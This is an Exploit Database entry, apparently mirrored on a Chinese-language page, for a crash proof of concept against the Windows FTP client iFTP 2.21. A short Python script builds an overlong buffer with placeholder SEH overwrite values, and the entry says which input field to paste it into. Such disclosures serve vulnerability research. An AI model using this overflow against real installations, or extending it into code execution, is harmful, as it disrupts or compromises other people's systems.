i.FTP 2.21 – Overflow Crash (SEH) (PoC)

• Exploit Database
• 15 阅读

• 作者： Avinash Thapa
  日期： 2015-04-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36847/

• # iFTP 2.21 SEH overwritten Crash PoC
  # Author: Avinash Kumar Thapa "-Acid"
  # Date of Testing :28th April'2015
  # Vendor's home page: http://www.memecode.com/iftp.php
  # Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
  # Crash Point: Go to Schedule > Schedule download > {+} >Time field
  
  
  buffer = "A"*600
  
  buffer += "BBBB" # Pointer to Next SEH Record
  
  buffer += "CCCC" # SEH HANDLER
  
  
  file = "test.txt"
  
  f = open(file, "w")
  
  f.write(buffer)
  
  f.close()